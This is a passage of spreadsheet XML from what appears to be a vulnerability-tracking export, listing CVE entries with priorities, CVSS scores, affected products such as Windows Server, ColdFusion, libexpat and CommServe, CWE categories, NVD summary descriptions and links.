      <c r="H1133" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1133" s="5" t="inlineStr"/>
      <c r="J1133" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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33" s="5" t="inlineStr"/>
      <c r="M1133" s="5" t="inlineStr"/>
      <c r="N1133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1133" s="5" t="inlineStr"/>
      <c r="Q1133" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R1133" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72923</t>
        </is>
      </c>
      <c r="D1134" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1134" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1134" s="5" t="inlineStr"/>
      <c r="H1134" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1134" s="5" t="inlineStr"/>
      <c r="J1134" s="5" t="inlineStr"/>
      <c r="K1134" s="5" t="inlineStr"/>
      <c r="L1134" s="5" t="inlineStr"/>
      <c r="M1134" s="5" t="inlineStr"/>
      <c r="N1134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1134" s="5" t="inlineStr"/>
      <c r="Q1134" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1134"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S1134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t>
        </is>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="D1135" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1135" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1135" s="5" t="inlineStr"/>
      <c r="H1135" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1135" s="5" t="inlineStr"/>
      <c r="J1135" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1135" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1135" s="5" t="inlineStr"/>
      <c r="M1135" s="5" t="inlineStr"/>
      <c r="N1135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1135" s="5" t="inlineStr"/>
      <c r="Q1135" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1135" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72932</t>
        </is>
      </c>
      <c r="D1136" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1136" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1136" s="5" t="inlineStr"/>
      <c r="H1136" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1136" s="5" t="inlineStr"/>
      <c r="J1136" s="5" t="inlineStr"/>
      <c r="K1136" s="5" t="inlineStr"/>
      <c r="L1136" s="5" t="inlineStr"/>
      <c r="M1136" s="5" t="inlineStr"/>
      <c r="N1136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1136" s="5" t="inlineStr"/>
      <c r="Q1136" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R1136" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t>
        </is>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72943</t>
        </is>
      </c>
      <c r="D1137" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1137" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1137" s="5" t="inlineStr"/>
      <c r="H1137" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1137" s="5" t="inlineStr"/>
      <c r="J1137" s="5" t="inlineStr"/>
      <c r="K1137" s="5" t="inlineStr"/>
      <c r="L1137" s="5" t="inlineStr"/>
      <c r="M1137" s="5" t="inlineStr"/>
      <c r="N1137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1137" s="5" t="inlineStr"/>
      <c r="Q1137" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1137" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t>
        </is>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72949</t>
        </is>
      </c>
      <c r="D1138" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1138" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1138" s="5" t="inlineStr"/>
      <c r="H1138" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1138" s="5" t="inlineStr"/>
      <c r="J1138" s="5" t="inlineStr"/>
      <c r="K1138" s="5" t="inlineStr"/>
      <c r="L1138" s="5" t="inlineStr"/>
      <c r="M1138" s="5" t="inlineStr"/>
      <c r="N1138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1138" s="5" t="inlineStr"/>
      <c r="Q1138" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1138" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t>
        </is>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72954</t>
        </is>
      </c>
      <c r="D1139" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1139" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1139" s="5" t="inlineStr"/>
      <c r="H1139" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1139" s="5" t="inlineStr"/>
      <c r="J1139" s="5" t="inlineStr"/>
      <c r="K1139" s="5" t="inlineStr"/>
      <c r="L1139" s="5" t="inlineStr"/>
      <c r="M1139" s="5" t="inlineStr"/>
      <c r="N1139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1139" s="5" t="inlineStr"/>
      <c r="Q1139" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1139" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t>
        </is>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72989</t>
        </is>
      </c>
      <c r="D1140" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1140" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1140" s="5" t="inlineStr"/>
      <c r="H1140" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1140" s="5" t="inlineStr"/>
      <c r="J1140" s="5" t="inlineStr"/>
      <c r="K1140" s="5" t="inlineStr"/>
      <c r="L1140" s="5" t="inlineStr"/>
      <c r="M1140" s="5" t="inlineStr"/>
      <c r="N1140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1140" s="5" t="inlineStr"/>
      <c r="Q1140" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1140" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t>
        </is>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D1141" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1141" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1141" s="5" t="inlineStr"/>
      <c r="H1141" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1141" s="5" t="inlineStr"/>
      <c r="J1141" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K114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141" s="5" t="inlineStr"/>
      <c r="M1141" s="5" t="inlineStr"/>
      <c r="N1141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1141" s="5" t="inlineStr"/>
      <c r="Q1141" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1141" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S1141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1142" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75465</t>
        </is>
      </c>
      <c r="D1142" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1142" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1142" s="5" t="inlineStr"/>
      <c r="H1142" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1142" s="5" t="inlineStr"/>
      <c r="J1142" s="5" t="inlineStr"/>
      <c r="K1142" s="5" t="inlineStr"/>
      <c r="L1142" s="5" t="inlineStr"/>
      <c r="M1142" s="5" t="inlineStr"/>
      <c r="N1142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1142" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P1142" s="5" t="inlineStr"/>
      <c r="Q1142" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1142" s="5" t="inlineStr">
        <is>
          <t>The /api.php/user/get_list endpoint in Maccms v10 v2026.1000.4055 is vulnerable to an Incorrect Access Control issue. The interface fails to perform any authentication or authorization checks. An unauthenticated remote attacker can send a crafted HTTP GET request with limit and offset parameters to paginate and retrieve sensitive information of all registered users.</t>
        </is>
      </c>
      <c r="S1142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75465</t>
        </is>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75998</t>
        </is>
      </c>
      <c r="D1143" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1143" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G1143" s="5" t="inlineStr"/>
      <c r="H1143" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1143" s="5" t="inlineStr"/>
      <c r="J1143" s="5" t="inlineStr"/>
      <c r="K1143" s="5" t="inlineStr"/>
      <c r="L1143" s="5" t="inlineStr"/>
      <c r="M1143" s="5" t="inlineStr"/>
      <c r="N1143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1143" s="5" t="inlineStr"/>
      <c r="Q1143" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1143" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="S1143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t>
        </is>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1144" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76956</t>
        </is>
      </c>
      <c r="D1144" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1144" s="5" t="inlineStr"/>
      <c r="H1144" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1144" s="5" t="inlineStr"/>
      <c r="J1144" s="5" t="inlineStr"/>
      <c r="K1144" s="5" t="inlineStr">
        <is>
          <t>libexpat_project:libexpat</t>
        </is>
      </c>
      <c r="L1144" s="5" t="inlineStr"/>
      <c r="M1144" s="5" t="inlineStr"/>
      <c r="N1144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1144" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P1144" s="5" t="inlineStr"/>
      <c r="Q1144" s="5" t="inlineStr">
        <is>
          <t>CWE-394</t>
        </is>
      </c>
      <c r="R1144" s="5" t="inlineStr">
        <is>
          <t>In libexpat 2.8.2 and 2.8.3 before 2.8.4, misinterpretation of getentropy's return code leads to insufficient entropy, which results in being vulnerable to hash flooding attacks, causing a denial of service via crafted XML content.</t>
        </is>
      </c>
      <c r="S1144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76956</t>
        </is>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77101</t>
        </is>
      </c>
      <c r="D1145" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1145" s="5" t="inlineStr"/>
      <c r="H1145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1145" s="5" t="inlineStr"/>
      <c r="J1145" s="5" t="inlineStr"/>
      <c r="K1145" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L1145" s="5" t="inlineStr"/>
      <c r="M1145" s="5" t="inlineStr"/>
      <c r="N1145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1145" s="5" t="inlineStr"/>
      <c r="Q1145" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R1145" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="S1145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t>
        </is>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77102</t>
        </is>
      </c>
      <c r="D1146" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1146" s="5" t="inlineStr"/>
      <c r="H1146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1146" s="5" t="inlineStr"/>
      <c r="J1146" s="5" t="inlineStr"/>
      <c r="K1146" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L1146" s="5" t="inlineStr"/>
      <c r="M1146" s="5" t="inlineStr"/>
      <c r="N1146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1146" s="5" t="inlineStr"/>
      <c r="Q1146" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1146" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="S1146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t>
        </is>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77103</t>
        </is>
      </c>
      <c r="D1147" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1147" s="5" t="inlineStr"/>
      <c r="H1147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1147" s="5" t="inlineStr"/>
      <c r="J1147" s="5" t="inlineStr"/>
      <c r="K1147" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L1147" s="5" t="inlineStr"/>
      <c r="M1147" s="5" t="inlineStr"/>
      <c r="N1147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1147" s="5" t="inlineStr"/>
      <c r="Q1147" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R1147" s="5" t="inlineStr">
        <is>
          <t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="S1147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t>
        </is>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77104</t>
        </is>
      </c>
      <c r="D1148" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1148" s="5" t="inlineStr"/>
      <c r="H1148" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1148" s="5" t="inlineStr"/>
      <c r="J1148" s="5" t="inlineStr"/>
      <c r="K1148" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L1148" s="5" t="inlineStr"/>
      <c r="M1148" s="5" t="inlineStr"/>
      <c r="N1148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1148" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1148" s="5" t="inlineStr"/>
      <c r="Q1148" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1148" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="S1148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t>
        </is>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77108</t>
        </is>
      </c>
      <c r="D1149" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1149" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G1149" s="5" t="inlineStr"/>
      <c r="H1149" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1149" s="5" t="inlineStr"/>
      <c r="J1149" s="5" t="inlineStr"/>
      <c r="K1149" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L1149" s="5" t="inlineStr"/>
      <c r="M1149" s="5" t="inlineStr"/>
      <c r="N1149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1149" s="5" t="inlineStr"/>
      <c r="Q1149" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1149"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S1149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t>
        </is>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1150" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77124</t>
        </is>
      </c>
      <c r="D1150" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1150" s="5" t="inlineStr">
        <is>
          <t>103e4ec9-0a87-450b-af77-479448ddef11</t>
        </is>
      </c>
      <c r="G1150" s="5" t="inlineStr"/>
      <c r="H1150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1150" s="5" t="inlineStr"/>
      <c r="J1150" s="5" t="inlineStr"/>
      <c r="K1150" s="5" t="inlineStr"/>
      <c r="L1150" s="5" t="inlineStr"/>
      <c r="M1150" s="5" t="inlineStr"/>
      <c r="N1150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1150" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1150" s="5" t="inlineStr"/>
      <c r="Q1150" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R1150" s="5" t="inlineStr">
        <is>
          <t>In affected versions of Nexus Repository 3, the script execution endpoint (POST /service/rest/v1/script/{name}/run) did not verify whether script execution had been administratively disabled. An account holding script-execution permission could continue to run previously-created scripts even after an administrator set nexus.scripts.allowCreation=false, undermining the expectation that this setting fully blocks script execution.</t>
        </is>
      </c>
      <c r="S1150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77124</t>
        </is>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
